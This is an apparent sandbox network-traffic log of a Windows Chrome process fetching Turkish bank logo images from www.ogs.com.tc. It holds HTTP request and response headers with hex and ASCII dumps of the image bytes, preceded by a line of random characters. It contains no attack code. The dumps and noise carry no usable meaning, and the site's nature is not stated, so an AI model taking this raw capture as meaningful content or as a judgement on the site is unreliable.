HP7~NF`?2gY{a@<~f=*KyKxXnC\BaV=EW/W}Cg_uGw]d{j(]g[a:\|300oG5U\'gO1kI}$Y+#FN~g]wzw:c1'phMQ21M\|3Lb:oo7mY

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49781	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:19 UTC	371	OUT	GET /assets/images/banks/sekerbank.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:19 UTC	284	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:19 GMT Content-Type: image/jpeg Content-Length: 30853 Last-Modified: Thu, 23 May 2024 21:37:18 GMT Connection: close ETag: "664fb70e-7885" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:19 UTC	16100	IN	Data Raw: ff d8 ff e1 09 6f 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 31 30 3a 30 31 20 31 38 3a 30 35 3a 34 31 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00 Data Ascii: oExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:10:01 18:05:41"
2024-05-25 22:17:19 UTC	14753	IN	Data Raw: 79 7e 33 4e 00 62 ad ed 7a ba bd ce 9c 87 af e4 a7 a7 af 05 88 cf e2 1c 3e 5f 3f b8 28 78 63 da 3e 8c 7b 47 d1 8f 68 fa 30 0e ac c7 be 32 f6 7d 58 43 4c c9 a7 a2 bf 17 9a a7 0e 7a f1 c1 4f 9b 19 01 f0 60 93 83 e5 3e bc 32 f0 3f 2f 4f 87 8b 04 74 83 43 eb f0 f9 6b 81 e3 a1 f8 b0 72 19 75 79 fe 3c 7b 23 e0 c2 93 d0 6b e8 23 e3 f7 1b c7 5c 4b f8 a7 03 a8 f8 7a fd c6 c5 7c 67 d6 70 2a d9 f8 86 2a 46 43 ac fb a4 f5 7b 8b e5 18 8f f1 d7 d6 31 c2 bd 3e 1d 7e 2c 07 39 a8 cf ee fc 1e 8c 50 f1 f7 0f 1a e5 d0 71 52 33 f2 1c 7b 3e 83 8f 67 d0 71 ec fa 0e 3d 9f 41 c7 b3 e8 38 ae 9f 7b 75 d7 1c 30 09 14 03 19 70 1e 1e 8f b9 82 3c 79 f9 fa 7e 5f 87 14 e2 bd 1f 26 38 1c 54 8a 66 7d 78 3e 53 eb c0 23 88 f5 74 fc b8 12 2f 1a 7c 23 ee 56 a3 ce 3a 70 ac 33 15 f4 1f 93 8e 2a Data Ascii: y~3Nbz>_?(xc>{Gh02}XCLzO`>2?/OtCkruy<{#k#\Kz\|gp*FC{1>~,9PqR3{>gq=A8{u0p<y~_&8Tf}x>S#t/\|#V:p3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49780	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:19 UTC	362	OUT	GET /assets/images/edkkds.svg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:19 UTC	286	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:19 GMT Content-Type: image/svg+xml Content-Length: 8746 Last-Modified: Thu, 23 May 2024 21:37:21 GMT Connection: close ETag: "664fb711-222a" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:19 UTC	8746	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 36 37 32 2e 35 20 31 30 30 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 45 36 45 36 45 36 22 20 64 3d 22 4d 38 36 2e 31 20 32 36 2e 34 63 2d 2e 31 2d 31 2d 2e 39 2d 32 2d 32 2d 32 2e 33 6c 2d 33 38 2e 33 2d 31 33 63 2d 2e 36 2d 2e 32 2d 31 2e 34 2d 2e 32 2d 32 2e 31 20 30 6c 2d 33 38 2e 34 20 31 33 63 2d 31 20 2e 33 2d 31 2e 39 20 31 2e 32 2d 32 20 32 2e 33 43 2e 36 20 35 32 2e 35 20 35 20 37 32 2e 33 20 31 36 2e 38 20 38 35 2e 35 20 32 38 2e 39 20 39 38 2e 37 20 34 34 20 39 39 2e 38 20 34 34 2e 37 20 39 39 2e 38 68 2e 34 63 2e 36 20 30 20 31 35 2e 38 2d 31 20 32 37 2e 38 2d 31 34 2e 33 43 38 34 2e Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 672.5 100"><path fill="#E6E6E6" d="M86.1 26.4c-.1-1-.9-2-2-2.3l-38.3-13c-.6-.2-1.4-.2-2.1 0l-38.4 13c-1 .3-1.9 1.2-2 2.3C.6 52.5 5 72.3 16.8 85.5 28.9 98.7 44 99.8 44.7 99.8h.4c.6 0 15.8-1 27.8-14.3C84.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49777	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:19 UTC	604	OUT	GET /assets/images/banks/garanti.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.ogs.com.tc/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:19 UTC	283	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:19 GMT Content-Type: image/jpeg Content-Length: 5268 Last-Modified: Thu, 23 May 2024 21:37:13 GMT Connection: close ETag: "664fb709-1494" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:19 UTC	5268	IN	Data Raw: 52 49 46 46 8c 14 00 00 57 45 42 50 56 50 38 20 80 14 00 00 30 63 00 9d 01 2a f4 01 c8 00 3e 49 24 90 45 a2 a2 21 91 5a 9c 8c 28 04 84 b3 b7 70 bb 00 86 6f 7e cd b9 67 d8 ff 85 f3 bd b3 bf 7e de 9b b2 7c ae 3c 7b f3 af f9 ff d0 3d a7 fa 85 f3 04 fd 4e f3 9e fd 49 f7 bf e6 03 f6 63 f6 c7 dd 33 fb ef ec e7 b9 cf 40 0f e3 1f ef 7a c7 bd 01 bc b2 bf 75 3e 16 bf b4 ff ca fd 99 f6 97 ff ff 9c b9 fe 03 b5 3f ee 1e 27 fe 2f f4 6f dd 7f 25 bf 76 fd fa 32 c7 d8 f6 a8 3f 22 fb 19 f9 1f ec df b5 bf 95 5f 7b 3f 88 ff 37 e2 4f 00 5f c4 ff 9c 7f 7e fc b3 fc a3 e3 8e 00 1f 98 7f 4e ff 3b f6 e7 e9 3b aa 0f 56 9e e0 1f cd ff ab ff b4 f5 ef fe 27 83 b5 00 ff a5 ff 65 ff b5 fe 5b dd 97 fa ef fd 5f eb 3d 07 fd 31 ff 97 fc ff c0 6f f3 6f ed 5f f2 3f bf f6 8d fd bb ff ff ee db Data Ascii: RIFFWEBPVP8 0c*>I$E!Z(po~g~\|<{=NIc3@zu>?'/o%v2?"_{?7O_~N;;V'e[_=1oo_?

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49778	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:19 UTC	601	OUT	GET /assets/images/banks/halk.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.ogs.com.tc/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:19 UTC	283	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:19 GMT Content-Type: image/jpeg Content-Length: 4904 Last-Modified: Thu, 23 May 2024 21:37:14 GMT Connection: close ETag: "664fb70a-1328" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:19 UTC	4904	IN	Data Raw: 52 49 46 46 20 13 00 00 57 45 42 50 56 50 38 20 14 13 00 00 90 61 00 9d 01 2a f4 01 c8 00 3e 49 24 90 46 22 a2 21 a1 21 f7 59 08 50 09 09 65 6e e1 75 4b e1 cf b2 7e 2e f7 c8 52 4e df fd af f6 7b fb 4f bc 5d 7f fb 9f e2 af ea 9e e7 ff ba 76 91 cb df da fe d7 3d e9 3c 4b f3 7f f2 df d3 7f bd 7e e3 fc f7 fe df fe 77 d8 af e8 0f 60 3f ea 7f cf 3a 47 f9 80 fd bf f5 36 fe e7 fa 53 ee 03 f6 0b f6 97 fc 07 c8 07 f1 ef f0 1f f8 3d a4 bf cc fb 10 7f 8b ff 59 ff ff dc 37 f9 37 f8 6f ff fe b9 7f b7 5f ff fe 50 ff b2 7f c5 fd 9e f6 a8 ff ff ec 01 ff ff d4 03 ff ff 10 f7 f3 9f c6 ef 0a 3f c2 fe 54 f6 10 f9 e7 d7 ee 4e cf 33 f5 7f f0 5f d6 3f 65 bf 2c be fd ff 21 df ff 00 bf 63 ff 83 fc b3 e1 1d 00 7f 9b 7f 3f ff 63 f9 87 e7 7d fd 7f e3 5f ba 5f 58 ff d6 fe 45 7d 00 7f Data Ascii: RIFF WEBPVP8 a*>I$F"!!YPenuK~.RN{O]v=<K~w`?:G6S=Y77o_P?TN3_?e,!c?c}__XE}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49779	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:19 UTC	365	OUT	GET /assets/images/banks/ptt.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:19 UTC	283	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:19 GMT Content-Type: image/jpeg Content-Length: 5260 Last-Modified: Thu, 23 May 2024 21:37:18 GMT Connection: close ETag: "664fb70e-148c" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:19 UTC	5260	IN	Data Raw: 52 49 46 46 84 14 00 00 57 45 42 50 56 50 38 20 78 14 00 00 30 5f 00 9d 01 2a f4 01 c8 00 3e 49 24 90 45 a2 a2 21 91 79 e4 70 28 04 84 b1 b7 70 bb 55 fe 57 da fb 4a b2 b7 63 fc 8e fc b5 f9 6d a9 ff 55 fc 5d fd 2f f6 93 9d 8e b2 f2 ae f1 af cb ff d0 ff 6d fd cd ff 0d ff ff ff ff df af f3 3f db bd 86 7e 8e ff 2d ee 01 fa 67 fe 5f fa ef f8 ef f7 3f bf ff 30 1e a2 ff 73 3d 40 7f 3c fe f5 ff 87 fc 7f bb 1f f6 bf d2 df 72 1f b3 bf f0 3f c0 7c 00 7f 47 fe ed e9 6f ec 2d fb 93 ec 0d fc fb fc 2f fe 5f 5c af fc 5f ec be 0f 7f ac 7f a7 fd a4 f8 1b fe 85 fd a7 fe 7f e7 bf c8 07 ff ff 6c ce 91 7e a1 ff 76 ed 4f fb 5f da d7 65 c7 a7 7d be e5 1f d4 7e 65 7f 21 fb 4f f9 bf ef 5f b8 9f 95 ff 25 f7 b3 f1 4b fb df 50 8f c6 ff 95 7f 91 fe c1 fb 8d c2 eb 67 fd 02 3d da fa 4f Data Ascii: RIFFWEBPVP8 x0_*>I$E!yp(pUWJcmU]/m?~-g_?0s=@<r?\|Go-/_\_l~vO_e}~e!O_%KPg=O

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49784	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:22 UTC	365	OUT	GET /assets/images/banks/ykb.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:22 UTC	282	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:22 GMT Content-Type: image/jpeg Content-Length: 4042 Last-Modified: Thu, 23 May 2024 21:37:20 GMT Connection: close ETag: "664fb710-fca" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:22 UTC	4042	IN	Data Raw: 52 49 46 46 c2 0f 00 00 57 45 42 50 56 50 38 20 b6 0f 00 00 b0 58 00 9d 01 2a f4 01 c8 00 3e 49 24 91 45 a2 a2 21 92 1a 14 48 28 04 84 b3 b7 70 bb 58 8d 80 03 b1 ea 72 f9 7f 37 7b 6f f7 fd bd ca 73 ca f7 8b 7f d5 7f 51 fc 99 f9 e5 fd c7 fc 97 b3 6f 30 0f d7 5e 90 9e 60 3f 5f 7f 65 fd d5 7f bb 7e be fb 8e fd 8f fd 77 f8 00 fe 75 fd f3 d6 0b d4 e3 fb bf fc ef 60 7f e5 bf ed 3d 36 7f 74 be 17 ff af ff c8 fd bc f6 b8 cd 3d fe eb da af f9 1f c9 4e c8 3f 74 7b 53 cb f5 e9 7e d2 7e 77 fb b7 ed ef c6 df e4 3b d1 e0 11 eb 8f f3 9f 93 5f 96 5c 73 20 03 eb 47 fa 7f 10 0d 54 32 00 fe 69 fd 27 fe 27 1f 6d 01 3f 96 ff 72 ff c9 fe 2f d9 5f ea 9f 43 7f 51 ff ec ff 33 f0 2d fa e7 ff 4f fb cf 6a cf 45 01 4b e7 7e 7d c1 7b 82 f7 05 ee 0b dc 17 b8 2f 70 5e e0 bd c1 7b 82 f7 Data Ascii: RIFFWEBPVP8 X*>I$E!H(pXr7{osQo0^`?_e~wu`=6t=N?t{S~~w;_\s GT2i''m?r/_CQ3-OjEK~}{/p^{

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49786	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:22 UTC	367	OUT	GET /assets/images/banks/vakif.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:22 UTC	283	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:22 GMT Content-Type: image/jpeg Content-Length: 4414 Last-Modified: Thu, 23 May 2024 21:37:20 GMT Connection: close ETag: "664fb710-113e" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:22 UTC	4414	IN	Data Raw: 52 49 46 46 36 11 00 00 57 45 42 50 56 50 38 20 2a 11 00 00 90 5b 00 9d 01 2a f4 01 c8 00 3e 49 24 8f 46 22 a2 21 21 22 32 48 d8 50 09 09 69 6e e1 77 61 1f c8 1a 5c 7d 4b f2 1f f2 03 9e d7 69 3b ef be f8 5d 3a 8c fb ef e4 97 fa ae d0 1e 60 1f a4 1f e6 7a 91 79 80 fe 53 fd 4f fd c7 f7 2f 7c 7f 40 1e 80 1f aa 3d 60 1f a8 1e c1 1f b4 7e 98 1f b7 3f 05 df b3 7f b5 ff 01 7f ca 7f b0 6a ab f9 97 fb 37 64 bf d2 ff a3 fe b8 7f 5c ec 3a ef 37 ad 9c ad e2 83 f1 0f a9 bf 6b fe bf fb 25 fd bf f7 4b e2 8f ea 5f 91 1f 8d de cd f0 02 fc 47 f8 ef f6 0f cb 5f c8 fe 34 c0 01 fa 5f f5 6f f0 ff 99 1f d8 fd 07 3f 6c f4 27 ec a7 fb bf 70 0f e5 1f cd bf cc 7e 67 fa c7 7f 20 f1 6f a0 07 f1 8f ec 1f ea 7e f7 7e 37 3f d1 ff 43 fe 3b f7 33 db bf cf 7f f1 ff c6 7f 99 f9 0c fe 5d fd Data Ascii: RIFF6WEBPVP8 [>I$F"!!"2HPinwa\}Ki;]:`zySO/\|@=`~?j7d\:7k%K_G_4_o?l'p~g o~~7?C;3]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49785	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:22 UTC	366	OUT	GET /assets/images/banks/odea.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:22 UTC	284	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:22 GMT Content-Type: image/jpeg Content-Length: 24936 Last-Modified: Thu, 23 May 2024 21:37:17 GMT Connection: close ETag: "664fb70d-6168" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:22 UTC	16100	IN	Data Raw: ff d8 ff e1 0a 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 31 30 3a 30 31 20 31 37 3a 33 34 3a 33 34 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00 Data Ascii: ZExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:10:01 17:34:34"
2024-05-25 22:17:22 UTC	8836	IN	Data Raw: 2a cd d2 20 6e c7 29 4a a1 4a 72 c9 59 25 a2 61 a8 3c 9c c6 d6 86 ae f2 07 32 88 5d 73 43 95 d4 bb 77 26 ae e9 54 52 3e 5d cc 80 50 af 3f 66 bb 04 9b 38 55 67 51 4f da b8 66 aa 8b 90 8d dd bb fe b2 78 d7 b3 69 78 75 a2 37 91 79 6c 45 ca d9 95 5a e6 29 36 79 2c f6 cd 5e d0 ab f2 55 b3 d8 e0 1c b2 99 61 18 fe cb 23 14 ba a2 d9 74 54 39 da 90 a2 6f 01 31 4c f6 cd 75 b3 58 6e 16 49 35 3d 59 1b 05 a6 6a 4a c1 39 20 a8 88 8f a8 f6 5a 59 cb b7 ee d4 11 11 f7 a8 a1 87 df d0 4f bf a5 5b 58 c1 09 0a a0 4d 3c ad cc b6 89 14 cf e2 24 50 24 56 64 46 62 43 01 83 b0 f9 f6 1e e1 d3 49 28 c7 8e e3 a4 63 dc a2 f1 84 83 07 0b 34 7a c9 e3 65 0a b3 77 4d 1d 37 3a 6b b6 72 dd 52 01 88 72 18 a6 21 80 04 04 04 3a cb fe 5f fc db d3 67 b6 4c ab 68 97 63 9e e1 7a be 87 2a e6 77 45 Data Ascii: * n)JJrY%a<2]sCw&TR>]P?f8UgQOfxixu7ylEZ)6y,^Ua#tT9o1LuXnI5=YjJ9 ZYO[XM<$P$VdFbCI(c4zewM7:krRr!:_gLhcz*wE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49787	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:22 UTC	375	OUT	GET /assets/images/banks/turkiyefinans.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:22 UTC	283	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:22 GMT Content-Type: image/jpeg Content-Length: 4528 Last-Modified: Thu, 23 May 2024 21:37:19 GMT Connection: close ETag: "664fb70f-11b0" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:22 UTC	4528	IN	Data Raw: 52 49 46 46 a8 11 00 00 57 45 42 50 56 50 38 20 9c 11 00 00 30 5e 00 9d 01 2a f4 01 c8 00 3e 49 24 90 45 a2 a2 21 91 ea f4 54 28 04 84 b3 b7 70 bb 54 d8 ff ba 79 be 55 7f bb 7e 21 fe 73 cf f6 82 bd 2c f6 6f ef df 6b 3e ea fd 40 79 80 7e 94 ff 75 fc b1 ed 15 e6 03 f5 cb f6 bf b0 37 f6 ff 50 0f e8 1f d5 7a cb 3d 00 3f 68 3d 33 7f 64 7e 0c 7f 6c ff f0 7f 8c f8 09 fd 64 ff c3 9c 95 fe 43 b3 3f ee bf 92 dd 74 7e 01 f6 5b f6 e7 9f 4c 50 7e 3b f5 eb ee 9f d7 7f 66 7f 23 3e 1d ff 63 e0 9f 00 2f c5 bf 8d ff b2 fe 77 fd a7 fd af 03 c0 00 fa 91 ff 07 fb ff e3 7f a0 6f f9 3e 89 fc d5 7b 80 ff 28 fe 67 fe 63 fb 77 ee 6f f7 2f ff fe f4 9e 0d 14 00 fe 67 fd 33 fd 7f f8 ef 5c af f5 bf c9 ff 91 fd e0 f7 2b f5 07 fe 8f f3 bf 02 bf cf 7f b1 7f d6 fe f1 da 2f f7 6b d9 73 f6 Data Ascii: RIFFWEBPVP8 0^*>I$E!T(pTyU~!s,ok>@y~u7Pz=?h=3d~ldC?t~[LP~;f#>c/wo>{(gcwo/g3\+/ks

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49788	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:22 UTC	366	OUT	GET /assets/images/banks/hsbc.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:22 UTC	284	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:22 GMT Content-Type: image/jpeg Content-Length: 33055 Last-Modified: Thu, 23 May 2024 21:37:15 GMT Connection: close ETag: "664fb70b-811f" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:22 UTC	16100	IN	Data Raw: ff d8 ff e1 0b 10 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 39 3a 32 38 20 30 31 3a 35 36 3a 30 32 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00 Data Ascii: ExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:09:28 01:56:02"
2024-05-25 22:17:22 UTC	16384	IN	Data Raw: 82 bd f1 2a e5 65 99 fb 3f b7 25 24 8e 17 68 7c 43 ac 61 6a 54 df c5 cd 9a 57 18 f2 b8 90 2c ed 79 60 64 9b cf 1c 9a 2e 99 cb 1e ea 07 33 23 08 c4 7a b0 07 01 24 ce 61 bd a1 e0 ed 9d 09 f1 94 44 ec 1d 5a 07 96 88 98 38 60 07 19 74 7a f3 96 d9 69 0b 60 80 e7 c7 c6 8a 99 a7 04 3d cc 19 1b 23 24 17 28 1c 36 1c cb 74 97 de 7c 92 94 a5 43 5c 14 38 ab 8a d4 ee 3d 13 9e 09 20 83 b6 3f 29 ea 34 77 40 7b 09 8c 15 cb 25 17 69 7c 4d 2a 0a 0b 13 63 88 74 76 37 45 a5 0e 47 5c 6a 70 bf 6c e4 8a e5 56 f6 29 b2 55 8c d0 dd 18 94 1c c6 84 76 5c f0 fa 76 ec c7 5c 88 38 bf f8 f9 87 bc 52 6d 01 87 6a 6d 76 bf 01 d1 22 d1 2f be 5e 5e 5e 5e 58 7c 71 78 c5 24 6a c0 a1 6c a1 60 57 bb aa 3f b2 fa 35 42 af 0d 55 99 b5 a6 40 9c 7f 80 a2 27 60 ea d0 3c b3 c4 c1 c3 00 38 c7 47 af 29 Data Ascii: e?%$h\|CajTW,y`d.3#z$aDZ8`tzi`=#$(6t\|C\8= ?)4w@{%i\|Mctv7EG\jplV)Uv\v\8Rmjmv"/^^^^X\|qx$jl`W?5BU@'`<8G)
